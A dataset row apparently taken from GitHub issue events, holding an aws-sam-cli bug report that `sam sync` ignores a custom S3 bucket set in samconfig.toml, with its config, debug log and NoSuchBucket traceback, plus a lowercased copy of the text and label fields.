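In Go the equivalent fix is re-declaring the variable inside the loop body (`bk := bk`) before taking `&bk` or starting the goroutine; since Go 1.22 the language gives each iteration a fresh variable, which resolves this class of finding.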
4,403
22,617,321,211
IssuesEvent
2022-06-30 00:20:29
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
closed
`sam sync` does not support custom bucket names
type/ux type/feature area/sam-config area/sync maintainer/need-followup area/accelerate
### Description: I don't use the default SAM bucket, I have my own. `sam sync` does not seem to support this. ### Steps to reproduce: Do `sam init` and create the zip Python 3.9 "Hello World" template. Create the following samconfig.toml ```toml version = 0.1 [default] [default.deploy] [default.deploy.parameters] stack_name = "sam-test" s3_bucket = "mybucket" s3_prefix = "sam-test" region = "us-west-2" capabilities = "CAPABILITY_IAM" ``` Run `sam build && sam deploy`, which succeeds. ### Observed result: `sam sync --stack-name sam-test` gives the following output. You can see it's attempting to use the default managed SAM bucket. ``` 2021-12-17 11:40:14,807 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': '5e92f8cb-75e3-4793-81f8-faee808f01a7', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,017 | Telemetry response: 200 2021-12-17 11:40:15,018 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': 'd0f3bfd9-c6d7-40db-9c8b-337bf8efcd98', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployConditionWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,283 | Telemetry response: 200 2021-12-17 11:40:15,284 | Using config file: 
samconfig.toml, config environment: default 2021-12-17 11:40:15,284 | Expand command line arguments to: 2021-12-17 11:40:15,284 | --template_file=/Users/luhn/Code/audit/test/template.yaml --stack_name=sam-test --dependency_layer --capabilities=('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') Managed S3 bucket: aws-sam-cli-managed-default-samclisourcebucket-1aupim17uw7m6 Default capabilities applied: ('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') To override with customized capabilities, use --capabilities flag or set it in samconfig.toml 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer This feature is currently in beta. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/. The SAM CLI will use the AWS Lambda, Amazon API Gateway, and AWS StepFunctions APIs to upload your code without performing a CloudFormation deployment. This will cause drift in your CloudFormation stack. **The sync command should only be used against a development stack**. Confirm that you are synchronizing a development stack and want to turn on beta features. Enter Y to proceed with the command, or enter N to cancel: [y/N]: 2021-12-17 11:40:17,467 |  Experimental features are enabled for this session. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/.  
2021-12-17 11:40:17,477 | No Parameters detected in the template 2021-12-17 11:40:17,499 | 2 stacks found in the template 2021-12-17 11:40:17,499 | No Parameters detected in the template 2021-12-17 11:40:17,510 | 2 resources found in the stack 2021-12-17 11:40:17,510 | No Parameters detected in the template 2021-12-17 11:40:17,519 | Found Serverless function with name='HelloWorldFunction' and CodeUri='hello_world/' 2021-12-17 11:40:17,519 | --base-dir is not presented, adjusting uri hello_world/ relative to /Users/luhn/Code/audit/test/template.yaml 2021-12-17 11:40:17,519 | No Parameters detected in the template 2021-12-17 11:40:17,538 | Executing the build using build context. 2021-12-17 11:40:17,538 | Instantiating build definitions 2021-12-17 11:40:17,540 | Same function build definition found, adding function (Previous: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , d23e058e-cbff-4bce-85b2-09954cf33d29, {}, {}, x86_64, []), Current: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , 85a07967-200c-4a31-81df-7700103e6ad7, {}, {}, x86_64, []), Function: Function(name='HelloWorldFunction', functionname='HelloWorldFunction', runtime='python3.9', memory=None, timeout=3, handler='app.lambda_handler', imageuri=None, packagetype='Zip', imageconfig=None, codeuri='/Users/luhn/Code/audit/test/hello_world', environment=None, rolearn=None, layers=[], events={'HelloWorld': {'Type': 'Api', 'Properties': {'Path': '/hello', 'Method': 'get', 'RestApiId': 'ServerlessRestApi'}}}, metadata=None, inlinecode=None, codesign_config_arn=None, architectures=['x86_64'], stack_path='')) 2021-12-17 11:40:17,541 | Async execution started 2021-12-17 11:40:17,541 | Invoking function functools.partial(<bound method CachedOrIncrementalBuildStrategyWrapper.build_single_function_definition of <samcli.lib.build.build_strategy.CachedOrIncrementalBuildStrategyWrapper object at 0x1056eb3d0>>, <samcli.lib.build.build_graph.FunctionBuildDefinition 
object at 0x1053468e0>) 2021-12-17 11:40:17,541 | Running incremental build for runtime python3.9 for build definition d23e058e-cbff-4bce-85b2-09954cf33d29 2021-12-17 11:40:17,541 | Waiting for async results 2021-12-17 11:40:17,541 | Manifest is not changed for d23e058e-cbff-4bce-85b2-09954cf33d29, running incremental build 2021-12-17 11:40:17,541 | Building codeuri: /Users/luhn/Code/audit/test/hello_world runtime: python3.9 metadata: {} architecture: x86_64 functions: ['HelloWorldFunction'] 2021-12-17 11:40:17,541 | Building to following folder /Users/luhn/Code/audit/test/.aws-sam/auto-dependency-layer/HelloWorldFunction 2021-12-17 11:40:17,542 | Loading workflow module 'aws_lambda_builders.workflows' 2021-12-17 11:40:17,546 | Registering workflow 'PythonPipBuilder' with capability 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,548 | Registering workflow 'NodejsNpmBuilder' with capability 'Capability(language='nodejs', dependency_manager='npm', application_framework=None)' 2021-12-17 11:40:17,549 | Registering workflow 'RubyBundlerBuilder' with capability 'Capability(language='ruby', dependency_manager='bundler', application_framework=None)' 2021-12-17 11:40:17,551 | Registering workflow 'GoDepBuilder' with capability 'Capability(language='go', dependency_manager='dep', application_framework=None)' 2021-12-17 11:40:17,553 | Registering workflow 'GoModulesBuilder' with capability 'Capability(language='go', dependency_manager='modules', application_framework=None)' 2021-12-17 11:40:17,555 | Registering workflow 'JavaGradleWorkflow' with capability 'Capability(language='java', dependency_manager='gradle', application_framework=None)' 2021-12-17 11:40:17,556 | Registering workflow 'JavaMavenWorkflow' with capability 'Capability(language='java', dependency_manager='maven', application_framework=None)' 2021-12-17 11:40:17,558 | Registering workflow 'DotnetCliPackageBuilder' with capability 
'Capability(language='dotnet', dependency_manager='cli-package', application_framework=None)' 2021-12-17 11:40:17,559 | Registering workflow 'CustomMakeBuilder' with capability 'Capability(language='provided', dependency_manager=None, application_framework=None)' 2021-12-17 11:40:17,559 | Found workflow 'PythonPipBuilder' to support capabilities 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,626 | Running workflow 'PythonPipBuilder' 2021-12-17 11:40:17,627 | Running PythonPipBuilder:CopySource 2021-12-17 11:40:17,629 | PythonPipBuilder:CopySource succeeded 2021-12-17 11:40:17,629 | Async execution completed 2021-12-17 11:40:17,630 | Auto creating dependency layer for each function resource into a nested stack 2021-12-17 11:40:17,630 | No Parameters detected in the template 2021-12-17 11:40:17,636 | 2 resources found in the stack sam-test 2021-12-17 11:40:17,636 | No Parameters detected in the template 2021-12-17 11:40:17,641 | Found Serverless function with name='HelloWorldFunction' and CodeUri='.aws-sam/auto-dependency-layer/HelloWorldFunction' 2021-12-17 11:40:17,641 | --base-dir is not presented, adjusting uri .aws-sam/auto-dependency-layer/HelloWorldFunction relative to /Users/luhn/Code/audit/test/template.yaml Build Succeeded Built Artifacts : .aws-sam/auto-dependency-layer Built Template : .aws-sam/auto-dependency-layer/template.yaml Commands you can use next ========================= [*] Invoke Function: sam local invoke -t .aws-sam/auto-dependency-layer/template.yaml [*] Test Function in the Cloud: sam sync --stack-name {stack-name} --watch [*] Deploy: sam deploy --guided --template-file .aws-sam/auto-dependency-layer/template.yaml 2021-12-17 11:40:17,667 | Executing the packaging using package context. 
2021-12-17 11:40:18,030 | Unable to export Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 114, in upload future.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 106, in result return self._coordinator.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 265, in result raise self._exception File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 126, in __call__ return self._execute_main(kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 150, in _execute_main return_value = self._main(**kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/upload.py", line 694, in _main client.put_object(Bucket=bucket, Key=key, Body=body, **extra_args) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 391, in _api_call return self._make_api_call(operation_name, kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 719, in _make_api_call raise error_class(parsed_response, operation_name) botocore.errorfactory.NoSuchBucket: An error occurred (NoSuchBucket) when calling the PutObject operation: The specified bucket does not exist The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 126, in export self.do_export(resource_id, resource_dict, parent_dir) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 
148, in do_export uploaded_url = upload_local_artifacts( File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 171, in upload_local_artifacts return zip_and_upload(local_path, uploader, extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 189, in zip_and_upload return uploader.upload_with_dedup(zip_file, precomputed_md5=md5_hash, extension=extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 143, in upload_with_dedup return self.upload(file_name, remote_path) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 121, in upload raise NoSuchBucketError(bucket_name=self.bucket_name) from ex samcli.commands.package.exceptions.NoSuchBucketError: S3 Bucket does not exist. 2021-12-17 11:40:18,033 | Sending Telemetry: {'metrics': [{'commandRunExperimental': {'requestId': '2898b15c-f378-4219-b192-da75e8d8e59d', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam sync', 'metricSpecificAttributes': {'experimentalAccelerate': True, 'experimentalAll': False}, 'duration': 3225, 'exitReason': 'ExportFailedError', 'exitCode': 1}}]} 2021-12-17 11:40:18,278 | Telemetry response: 200 Error: Unable to upload artifact HelloWorldFunction referenced by CodeUri parameter of HelloWorldFunction resource. S3 Bucket does not exist. ``` ### Expected result: I would expect a) sync to honor the settings in samconfig.toml or b) a CLI flag to set the S3 bucket name. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Mac OS Monterey 2. 
If using SAM CLI, `sam --version`: `SAM CLI, version 1.36.0` 3. AWS region: us-west-2
True
`sam sync` does not support custom bucket names - ### Description: I don't use the default SAM bucket, I have my own. `sam sync` does not seem to support this. ### Steps to reproduce: Do `sam init` and create the zip Python 3.9 "Hello World" template. Create the following samconfig.toml ```toml version = 0.1 [default] [default.deploy] [default.deploy.parameters] stack_name = "sam-test" s3_bucket = "mybucket" s3_prefix = "sam-test" region = "us-west-2" capabilities = "CAPABILITY_IAM" ``` Run `sam build && sam deploy`, which succeeds. ### Observed result: `sam sync --stack-name sam-test` gives the following output. You can see it's attempting to use the default managed SAM bucket. ``` 2021-12-17 11:40:14,807 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': '5e92f8cb-75e3-4793-81f8-faee808f01a7', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,017 | Telemetry response: 200 2021-12-17 11:40:15,018 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': 'd0f3bfd9-c6d7-40db-9c8b-337bf8efcd98', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployConditionWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,283 | Telemetry response: 200 
2021-12-17 11:40:15,284 | Using config file: samconfig.toml, config environment: default 2021-12-17 11:40:15,284 | Expand command line arguments to: 2021-12-17 11:40:15,284 | --template_file=/Users/luhn/Code/audit/test/template.yaml --stack_name=sam-test --dependency_layer --capabilities=('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') Managed S3 bucket: aws-sam-cli-managed-default-samclisourcebucket-1aupim17uw7m6 Default capabilities applied: ('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') To override with customized capabilities, use --capabilities flag or set it in samconfig.toml 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer This feature is currently in beta. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/. The SAM CLI will use the AWS Lambda, Amazon API Gateway, and AWS StepFunctions APIs to upload your code without performing a CloudFormation deployment. This will cause drift in your CloudFormation stack. **The sync command should only be used against a development stack**. Confirm that you are synchronizing a development stack and want to turn on beta features. Enter Y to proceed with the command, or enter N to cancel: [y/N]: 2021-12-17 11:40:17,467 | Experimental features are enabled for this session. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/.
2021-12-17 11:40:17,477 | No Parameters detected in the template 2021-12-17 11:40:17,499 | 2 stacks found in the template 2021-12-17 11:40:17,499 | No Parameters detected in the template 2021-12-17 11:40:17,510 | 2 resources found in the stack 2021-12-17 11:40:17,510 | No Parameters detected in the template 2021-12-17 11:40:17,519 | Found Serverless function with name='HelloWorldFunction' and CodeUri='hello_world/' 2021-12-17 11:40:17,519 | --base-dir is not presented, adjusting uri hello_world/ relative to /Users/luhn/Code/audit/test/template.yaml 2021-12-17 11:40:17,519 | No Parameters detected in the template 2021-12-17 11:40:17,538 | Executing the build using build context. 2021-12-17 11:40:17,538 | Instantiating build definitions 2021-12-17 11:40:17,540 | Same function build definition found, adding function (Previous: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , d23e058e-cbff-4bce-85b2-09954cf33d29, {}, {}, x86_64, []), Current: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , 85a07967-200c-4a31-81df-7700103e6ad7, {}, {}, x86_64, []), Function: Function(name='HelloWorldFunction', functionname='HelloWorldFunction', runtime='python3.9', memory=None, timeout=3, handler='app.lambda_handler', imageuri=None, packagetype='Zip', imageconfig=None, codeuri='/Users/luhn/Code/audit/test/hello_world', environment=None, rolearn=None, layers=[], events={'HelloWorld': {'Type': 'Api', 'Properties': {'Path': '/hello', 'Method': 'get', 'RestApiId': 'ServerlessRestApi'}}}, metadata=None, inlinecode=None, codesign_config_arn=None, architectures=['x86_64'], stack_path='')) 2021-12-17 11:40:17,541 | Async execution started 2021-12-17 11:40:17,541 | Invoking function functools.partial(<bound method CachedOrIncrementalBuildStrategyWrapper.build_single_function_definition of <samcli.lib.build.build_strategy.CachedOrIncrementalBuildStrategyWrapper object at 0x1056eb3d0>>, <samcli.lib.build.build_graph.FunctionBuildDefinition 
object at 0x1053468e0>) 2021-12-17 11:40:17,541 | Running incremental build for runtime python3.9 for build definition d23e058e-cbff-4bce-85b2-09954cf33d29 2021-12-17 11:40:17,541 | Waiting for async results 2021-12-17 11:40:17,541 | Manifest is not changed for d23e058e-cbff-4bce-85b2-09954cf33d29, running incremental build 2021-12-17 11:40:17,541 | Building codeuri: /Users/luhn/Code/audit/test/hello_world runtime: python3.9 metadata: {} architecture: x86_64 functions: ['HelloWorldFunction'] 2021-12-17 11:40:17,541 | Building to following folder /Users/luhn/Code/audit/test/.aws-sam/auto-dependency-layer/HelloWorldFunction 2021-12-17 11:40:17,542 | Loading workflow module 'aws_lambda_builders.workflows' 2021-12-17 11:40:17,546 | Registering workflow 'PythonPipBuilder' with capability 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,548 | Registering workflow 'NodejsNpmBuilder' with capability 'Capability(language='nodejs', dependency_manager='npm', application_framework=None)' 2021-12-17 11:40:17,549 | Registering workflow 'RubyBundlerBuilder' with capability 'Capability(language='ruby', dependency_manager='bundler', application_framework=None)' 2021-12-17 11:40:17,551 | Registering workflow 'GoDepBuilder' with capability 'Capability(language='go', dependency_manager='dep', application_framework=None)' 2021-12-17 11:40:17,553 | Registering workflow 'GoModulesBuilder' with capability 'Capability(language='go', dependency_manager='modules', application_framework=None)' 2021-12-17 11:40:17,555 | Registering workflow 'JavaGradleWorkflow' with capability 'Capability(language='java', dependency_manager='gradle', application_framework=None)' 2021-12-17 11:40:17,556 | Registering workflow 'JavaMavenWorkflow' with capability 'Capability(language='java', dependency_manager='maven', application_framework=None)' 2021-12-17 11:40:17,558 | Registering workflow 'DotnetCliPackageBuilder' with capability 
'Capability(language='dotnet', dependency_manager='cli-package', application_framework=None)' 2021-12-17 11:40:17,559 | Registering workflow 'CustomMakeBuilder' with capability 'Capability(language='provided', dependency_manager=None, application_framework=None)' 2021-12-17 11:40:17,559 | Found workflow 'PythonPipBuilder' to support capabilities 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,626 | Running workflow 'PythonPipBuilder' 2021-12-17 11:40:17,627 | Running PythonPipBuilder:CopySource 2021-12-17 11:40:17,629 | PythonPipBuilder:CopySource succeeded 2021-12-17 11:40:17,629 | Async execution completed 2021-12-17 11:40:17,630 | Auto creating dependency layer for each function resource into a nested stack 2021-12-17 11:40:17,630 | No Parameters detected in the template 2021-12-17 11:40:17,636 | 2 resources found in the stack sam-test 2021-12-17 11:40:17,636 | No Parameters detected in the template 2021-12-17 11:40:17,641 | Found Serverless function with name='HelloWorldFunction' and CodeUri='.aws-sam/auto-dependency-layer/HelloWorldFunction' 2021-12-17 11:40:17,641 | --base-dir is not presented, adjusting uri .aws-sam/auto-dependency-layer/HelloWorldFunction relative to /Users/luhn/Code/audit/test/template.yaml Build Succeeded Built Artifacts : .aws-sam/auto-dependency-layer Built Template : .aws-sam/auto-dependency-layer/template.yaml Commands you can use next ========================= [*] Invoke Function: sam local invoke -t .aws-sam/auto-dependency-layer/template.yaml [*] Test Function in the Cloud: sam sync --stack-name {stack-name} --watch [*] Deploy: sam deploy --guided --template-file .aws-sam/auto-dependency-layer/template.yaml 2021-12-17 11:40:17,667 | Executing the packaging using package context. 
2021-12-17 11:40:18,030 | Unable to export Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 114, in upload future.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 106, in result return self._coordinator.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 265, in result raise self._exception File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 126, in __call__ return self._execute_main(kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 150, in _execute_main return_value = self._main(**kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/upload.py", line 694, in _main client.put_object(Bucket=bucket, Key=key, Body=body, **extra_args) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 391, in _api_call return self._make_api_call(operation_name, kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 719, in _make_api_call raise error_class(parsed_response, operation_name) botocore.errorfactory.NoSuchBucket: An error occurred (NoSuchBucket) when calling the PutObject operation: The specified bucket does not exist The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 126, in export self.do_export(resource_id, resource_dict, parent_dir) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 
148, in do_export uploaded_url = upload_local_artifacts( File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 171, in upload_local_artifacts return zip_and_upload(local_path, uploader, extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 189, in zip_and_upload return uploader.upload_with_dedup(zip_file, precomputed_md5=md5_hash, extension=extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 143, in upload_with_dedup return self.upload(file_name, remote_path) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 121, in upload raise NoSuchBucketError(bucket_name=self.bucket_name) from ex samcli.commands.package.exceptions.NoSuchBucketError: S3 Bucket does not exist. 2021-12-17 11:40:18,033 | Sending Telemetry: {'metrics': [{'commandRunExperimental': {'requestId': '2898b15c-f378-4219-b192-da75e8d8e59d', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam sync', 'metricSpecificAttributes': {'experimentalAccelerate': True, 'experimentalAll': False}, 'duration': 3225, 'exitReason': 'ExportFailedError', 'exitCode': 1}}]} 2021-12-17 11:40:18,278 | Telemetry response: 200 Error: Unable to upload artifact HelloWorldFunction referenced by CodeUri parameter of HelloWorldFunction resource. S3 Bucket does not exist. ``` ### Expected result: I would expect a) sync to honor the settings in samconfig.toml or b) a CLI flag to set the S3 bucket name. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Mac OS Monterey 2. 
If using SAM CLI, `sam --version`: `SAM CLI, version 1.36.0` 3. AWS region: us-west-2
main
sam sync does not support custom bucket names description i don t use the default sam bucket i have my own sam sync does not seem to support this steps to reproduce do sam init and create the zip python hello world template create the following samconfig toml toml version stack name sam test bucket mybucket prefix sam test region us west capabilities capability iam run sam build sam deploy which succeeds observed result sam sync stack name sam test gives the following output you can see it s attempting to use the default managed sam bucket telemetry endpoint configured to be telemetry endpoint configured to be sending telemetry metrics telemetry response sending telemetry metrics telemetry response using config file samconfig toml config environment default expand command line arguments to template file users luhn code audit test template yaml stack name sam test dependency layer capabilities capability named iam capability auto expand managed bucket aws sam cli managed default samclisourcebucket default capabilities applied capability named iam capability auto expand to override with customized capabilities use capabilities flag or set it in samconfig toml using build directory as aws sam auto dependency layer using build directory as aws sam auto dependency layer this feature is currently in beta visit the docs page to learn more about the aws beta terms the sam cli will use the aws lambda amazon api gateway and aws stepfunctions apis to upload your code without performing a cloudformation deployment this will cause drift in your cloudformation stack the sync command should only be used against a development stack confirm that you are synchronizing a development stack and want to turn on beta features enter y to proceed with the command or enter n to cancel  experimental features are enabled for this session visit the docs page to learn more about the aws beta terms  no parameters detected in the template stacks found in the template no parameters detected in the 
template resources found in the stack no parameters detected in the template found serverless function with name helloworldfunction and codeuri hello world base dir is not presented adjusting uri hello world relative to users luhn code audit test template yaml no parameters detected in the template executing the build using build context instantiating build definitions same function build definition found adding function previous builddefinition users luhn code audit test hello world zip cbff current builddefinition users luhn code audit test hello world zip function function name helloworldfunction functionname helloworldfunction runtime memory none timeout handler app lambda handler imageuri none packagetype zip imageconfig none codeuri users luhn code audit test hello world environment none rolearn none layers events helloworld type api properties path hello method get restapiid serverlessrestapi metadata none inlinecode none codesign config arn none architectures stack path async execution started invoking function functools partial running incremental build for runtime for build definition cbff waiting for async results manifest is not changed for cbff running incremental build building codeuri users luhn code audit test hello world runtime metadata architecture functions building to following folder users luhn code audit test aws sam auto dependency layer helloworldfunction loading workflow module aws lambda builders workflows registering workflow pythonpipbuilder with capability capability language python dependency manager pip application framework none registering workflow nodejsnpmbuilder with capability capability language nodejs dependency manager npm application framework none registering workflow rubybundlerbuilder with capability capability language ruby dependency manager bundler application framework none registering workflow godepbuilder with capability capability language go dependency manager dep application framework none registering workflow 
gomodulesbuilder with capability capability language go dependency manager modules application framework none registering workflow javagradleworkflow with capability capability language java dependency manager gradle application framework none registering workflow javamavenworkflow with capability capability language java dependency manager maven application framework none registering workflow dotnetclipackagebuilder with capability capability language dotnet dependency manager cli package application framework none registering workflow custommakebuilder with capability capability language provided dependency manager none application framework none found workflow pythonpipbuilder to support capabilities capability language python dependency manager pip application framework none running workflow pythonpipbuilder running pythonpipbuilder copysource pythonpipbuilder copysource succeeded async execution completed auto creating dependency layer for each function resource into a nested stack no parameters detected in the template resources found in the stack sam test no parameters detected in the template found serverless function with name helloworldfunction and codeuri aws sam auto dependency layer helloworldfunction base dir is not presented adjusting uri aws sam auto dependency layer helloworldfunction relative to users luhn code audit test template yaml build succeeded built artifacts aws sam auto dependency layer built template aws sam auto dependency layer template yaml commands you can use next invoke function sam local invoke t aws sam auto dependency layer template yaml test function in the cloud sam sync stack name stack name watch deploy sam deploy guided template file aws sam auto dependency layer template yaml executing the packaging using package context unable to export traceback most recent call last file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package uploader py line in upload future result file opt homebrew cellar aws sam 
cli libexec lib site packages futures py line in result return self coordinator result file opt homebrew cellar aws sam cli libexec lib site packages futures py line in result raise self exception file opt homebrew cellar aws sam cli libexec lib site packages tasks py line in call return self execute main kwargs file opt homebrew cellar aws sam cli libexec lib site packages tasks py line in execute main return value self main kwargs file opt homebrew cellar aws sam cli libexec lib site packages upload py line in main client put object bucket bucket key key body body extra args file opt homebrew cellar aws sam cli libexec lib site packages botocore client py line in api call return self make api call operation name kwargs file opt homebrew cellar aws sam cli libexec lib site packages botocore client py line in make api call raise error class parsed response operation name botocore errorfactory nosuchbucket an error occurred nosuchbucket when calling the putobject operation the specified bucket does not exist the above exception was the direct cause of the following exception traceback most recent call last file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package packageable resources py line in export self do export resource id resource dict parent dir file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package packageable resources py line in do export uploaded url upload local artifacts file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package utils py line in upload local artifacts return zip and upload local path uploader extension file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package utils py line in zip and upload return uploader upload with dedup zip file precomputed hash extension extension file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package uploader py line in upload with dedup return self upload file name remote path file opt 
homebrew cellar aws sam cli libexec lib site packages samcli lib package uploader py line in upload raise nosuchbucketerror bucket name self bucket name from ex samcli commands package exceptions nosuchbucketerror bucket does not exist sending telemetry metrics telemetry response error unable to upload artifact helloworldfunction referenced by codeuri parameter of helloworldfunction resource bucket does not exist expected result i would expect a sync to honor the settings in samconfig toml or b a cli flag to set the bucket name additional environment details ex windows mac amazon linux etc os mac os monterey if using sam cli sam version sam cli version aws region us west
1
5,936
